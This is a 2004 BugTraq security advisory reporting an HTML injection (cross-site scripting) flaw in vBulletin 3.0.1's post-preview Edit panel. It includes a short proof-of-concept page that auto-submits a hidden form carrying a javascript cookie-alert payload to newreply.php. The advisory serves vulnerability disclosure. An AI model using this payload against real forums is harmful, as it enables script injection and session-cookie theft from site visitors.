BugTraq
vBulletin HTML Injection Vuln Jun 24 2004 12:05PM
Cheng Peng Su (apple_soup msn com)


Advisory Name : vBulletin HTML Injection Vulnerability

Release Date : June 24,2004

Application : vBulletin

Test On : 3.0.1 or others?

Vendor : Jelsoft(http://www.vbulletin.com/)

Discover : Cheng Peng Su(apple_soup_at_msn.com)

Intro:

From vendor's website ,it says that ,vBulletin is a powerful, scalable and

fully customizable forums package for your web site. It has been written using

the Web's quickest-growing scripting language; PHP, and is complimented with a

highly efficient and ultra fast back-end database engine built using MySQL.

Proof of concept:

While a user is previewing the post , both newreply.php and newthread.php

do sanitize the input in 'Preview',but not Edit-panel,malicious code can be

injected thru this flaw.

Exploit:

A page as below can lead visitor to a Preview page which contains XSS code.

-------------------------Remote.html-------------------------

<form action="http://host/newreply.php" name="vbform"

method="post" style='visibility:hidden'>

<input name="WYSIWYG_HTML"

value="<IMG src="javascript:alert(document.cookie)">"/>

<input name="do" value="postreply"/>

<input name="t" value="123456" />

<input name="p" value="123456" />

<input type="submit" class="button" name="preview"/>

</form>

<script>

document.all.preview.click();

</script>

-----------------------------End-----------------------------

Solution:

vBulletin Team will release a patch or a fixed version as soon as possible.

Contact:

Cheng Peng Su

apple_soup_at_msn.com

Class 1,Senior 2,High school attached to Wuhan University

Wuhan,Hubei,China

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus